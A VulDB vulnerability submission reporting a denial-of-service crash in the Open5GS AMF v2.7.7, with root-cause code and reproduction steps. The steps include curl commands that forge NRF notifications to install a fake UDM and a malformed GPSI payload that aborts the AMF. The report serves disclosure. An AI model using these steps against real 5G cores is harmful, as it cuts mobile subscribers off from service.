Submit #804336: Open5gs AMF v2.7.7 Denial of Serviceinfo

TitelOpen5gs AMF v2.7.7 Denial of Service
Beschreibung### Open5GS Release, Revision, or Tag v2.7.7 ### Description AMF aborts during a real UE registration flow when the `Nudm_SDM` `am-data` response contains a malformed GPSI entry whose string is just `msisdn` instead of a full `msisdn-...` identifier. This path is UE-driven: the crash is only reached after an external UE starts a normal 5G registration procedure and AMF performs: ```text PUT /nudm-uecm/v1/{supi}/registrations/amf-3gpp-access GET /nudm-sdm/v2/{supi}/am-data ``` inside the registration state machine. The vulnerable AMF code is: ```c gpsi = ogs_id_get_type(node->data); if (gpsi) { if (strncmp(gpsi, OGS_ID_GPSI_TYPE_MSISDN, strlen(OGS_ID_GPSI_TYPE_MSISDN)) == 0) { amf_ue->msisdn[amf_ue->num_of_msisdn] = ogs_id_get_value(node->data); ogs_assert(amf_ue->msisdn[amf_ue->num_of_msisdn]); amf_ue->num_of_msisdn++; } } ``` at `../src/amf/nudm-handler.c:60-69`. `ogs_id_get_value()` expects two `-`-separated tokens. For the string `msisdn`, the second `strsep()` returns `NULL`: ```c token = strsep(&p, "-"); ... token = strsep(&p, "-"); if (!token) { ogs_error("strsep[%s] failed", str); goto cleanup; } ``` at `../lib/proto/types.c:345-354`. That makes `ogs_id_get_value("msisdn")` return `NULL`, which immediately trips the AMF assertion at `nudm-handler.c:66-67`. This is distinct from the newly confirmed `gpsis` overflow issue. That earlier bug requires many valid `msisdn-*` entries and crashes after memory corruption; this one crashes with a single malformed GPSI value at a different crash site. ### Root cause - Entry chain: external UE registration -> AMF `PUT /nudm-uecm/.../amf-3gpp-access` -> AMF `GET /nudm-sdm/v2/{supi}/am-data` -> `amf_nudm_sdm_handle_provisioned()` - Exact crash site: `../src/amf/nudm-handler.c:66-67` - Upstream parser/business mismatch: `../lib/proto/types.c:345-354` - Root cause family: parser/business-logic mismatch leading to assertion abort - Controlling field: `AccessAndMobilitySubscriptionData.gpsis[0]` ### Steps to Reproduce 1. Start the Open5GS Docker lab and ensure these containers are running: ```bash docker start db ausf udm udr pcf smf upf amf nssf ``` 2. Confirm the subscriber exists in MongoDB. In my live run, the existing test subscriber was: ```text IMSI: 001011234567891 ``` 3. Start a real gNB and UE with the bundled UERANSIM configs: ```bash docker run --rm -d --name amf-audit-gnb --network open5gs \ --network-alias gnb.ueransim.org \ -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \ free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml docker run --rm -d --name amf-audit-ue --network open5gs \ --network-alias ue.ueransim.org \ --cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \ -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \ free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r ``` 4. Start the fake UDM helper on the host: ```bash node /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.js ``` 5. Replace the real UDM in AMF's local cache with the fake UDM: ```bash AMF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' amf) curl --http2-prior-knowledge -sS -i -m 8 \ -X POST "http://$AMF_IP/nnrf-nfm/v1/nf-status-notify" \ -H 'content-type: application/json' \ --data '{"event":"NF_DEREGISTERED","nfInstanceUri":"http://nrf.open5gs.org/nnrf-nfm/v1/nf-instances/4568f3be-3644-41f1-bff0-3b335fd843b5"}' curl --http2-prior-knowledge -sS -i -m 8 \ -X POST "http://$AMF_IP/nnrf-nfm/v1/nf-status-notify" \ -H 'content-type: application/json' \ --data '{"event":"NF_REGISTERED","nfInstanceUri":"http://10.33.33.1:18083/nnrf-nfm/v1/nf-instances/fake-udm-amf","nfProfile":{"nfInstanceId":"fake-udm-amf","nfType":"UDM","nfStatus":"REGISTERED","fqdn":"fake-udm-amf.local","ipv4Addresses":["10.33.33.1"],"allowedNfTypes":["SCP","AMF","SMF","AUSF"],"priority":0,"capacity":100,"load":0,"nfServices":[{"serviceInstanceId":"fake-udm-ueau","serviceName":"nudm-ueau","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AUSF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-uecm","serviceName":"nudm-uecm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-sdm","serviceName":"nudm-sdm","versions":[{"apiVersionInUri":"v2","apiFullVersion":"2.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0}]}}' ``` 6. Control experiment: configure the fake UDM to return a normal GPSI (`msisdn-1234567890`), then trigger UE registration. In the confirmed control run, the UE completed registration and PDU session establishment successfully. 7. Malicious experiment: change only the fake UDM mode so `am-data` returns: ```json {"gpsis":["msisdn"]} ``` Then start the UE registration flow again: ```bash printf 'am-data-gpsi-malformed\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode docker run --rm -d --name amf-audit-gnb --network open5gs \ --network-alias gnb.ueransim.org \ -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \ free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml docker run --rm -d --name amf-audit-ue --network open5gs \ --network-alias ue.ueransim.org \ --cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \ -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \ free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf docker logs --tail 120 amf ``` ### Logs Control evidence: ```text Initial Registration is successful PDU Session establishment is successful PSI[1] running 0 ``` Container state after the malicious response: ```text exited 134 2026-04-12T15:01:04.914002411Z 0 ``` AMF logs: ```text 04/12 15:00:56.403: [sbi] INFO: [nudm-ueau] NFService associated [28262e44-367f-41f1-862a-81de7e8f7ca7] (../lib/sbi/context.c:2109) 04/12 15:00:56.403: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111) 04/12 15:00:56.403: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.14:80] (../lib/sbi/context.c:2111) 04/12 15:00:56.403: [sbi] INFO: [nudm-uecm] NFService associated [28262e9e-367f-41f1-862a-81de7e8f7ca7] (../lib/sbi/context.c:2109) 04/12 15:00:56.403: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111) 04/12 15:00:56.403: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.14:80] (../lib/sbi/context.c:2111) 04/12 15:00:56.403: [sbi] INFO: [nudm-sdm] NFService associated [28262eda-367f-41f1-862a-81de7e8f7ca7] (../lib/sbi/context.c:2109) 04/12 15:00:56.403: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111) 04/12 15:00:56.403: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.14:80] (../lib/sbi/context.c:2111) 04/12 15:01:04.262: [sbi] INFO: [28259240-367f-41f1-862a-81de7e8f7ca7] (NRF-notify) NF_DEREGISTERED event [type:UDM] (../lib/sbi/nnrf-handler.c:1186) 04/12 15:01:04.289: [sbi] INFO: [fake-udm-amf] (NRF-notify) NF registered (../lib/sbi/nnrf-handler.c:1154) 04/12 15:01:04.289: [sbi] INFO: [fake-udm-amf] (NRF-notify) NF Profile updated [type:UDM] (../lib/sbi/nnrf-handler.c:1168) 04/12 15:01:04.289: [sbi] INFO: [UDM] NFInstance associated [fake-udm-amf] (../lib/sbi/context.c:2441) 04/12 15:01:04.289: [sbi] INFO: Setup NF EndPoint(fqdn) [fake-udm-amf.local:0] (../lib/sbi/context.c:2446) 04/12 15:01:04.289: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:80] (../lib/sbi/context.c:2446) 04/12 15:01:04.289: [sbi] INFO: [nudm-ueau] NFService associated [fake-udm-ueau] (../lib/sbi/context.c:2109) 04/12 15:01:04.289: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:18083] (../lib/sbi/context.c:2111) 04/12 15:01:04.289: [sbi] INFO: [nudm-uecm] NFService associated [fake-udm-uecm] (../lib/sbi/context.c:2109) 04/12 15:01:04.289: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:18083] (../lib/sbi/context.c:2111) 04/12 15:01:04.289: [sbi] INFO: [nudm-sdm] NFService associated [fake-udm-sdm] (../lib/sbi/context.c:2109) 04/12 15:01:04.289: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:18083] (../lib/sbi/context.c:2111) 04/12 15:01:04.569: [amf] INFO: gNB-N2 accepted[10.33.33.8]:33749 in ng-path module (../src/amf/ngap-sctp.c:113) 04/12 15:01:04.569: [amf] INFO: gNB-N2 accepted[10.33.33.8] in master_sm module (../src/amf/amf-sm.c:953) 04/12 15:01:04.576: [amf] INFO: [Added] Number of gNBs is now 1 (../src/amf/context.c:1277) 04/12 15:01:04.577: [amf] INFO: gNB-N2[10.33.33.8] max_num_of_ostreams : 10 (../src/amf/amf-sm.c:1000) 04/12 15:01:04.782: [amf] INFO: InitialUEMessage (../src/amf/ngap-handler.c:461) 04/12 15:01:04.782: [amf] INFO: [Added] Number of gNB-UEs is now 1 (../src/amf/context.c:2777) 04/12 15:01:04.782: [amf] INFO: RAN_UE_NGAP_ID[1] AMF_UE_NGAP_ID[1] TAC[1] CellID[0x10] (../src/amf/ngap-handler.c:622) 04/12 15:01:04.782: [amf] INFO: [suci-0-001-01-0000-0-0-1234567891] Unknown UE by SUCI (../src/amf/context.c:1912) 04/12 15:01:04.782: [amf] INFO: [Added] Number of AMF-UEs is now 1 (../src/amf/context.c:1688) 04/12 15:01:04.782: [gmm] INFO: Registration request (../src/amf/gmm-sm.c:1670) 04/12 15:01:04.782:
Quelle⚠️ https://github.com/open5gs/open5gs/issues/4405
Benutzer
 ZiyuLin (UID 93568)
Einreichung14.04.2026 11:41 (vor 2 Monaten)
Moderieren01.05.2026 10:57 (17 days later)
StatusAkzeptiert
VulDB Eintrag360536 [Open5GS bis 2.7.7 AMF /src/amf/nudm-handler.c ogs_id_get_value Denial of Service]
Punkte20

ZurückÜbersichtWeiter

Do you need the next level of professionalism?

Upgrade your account now!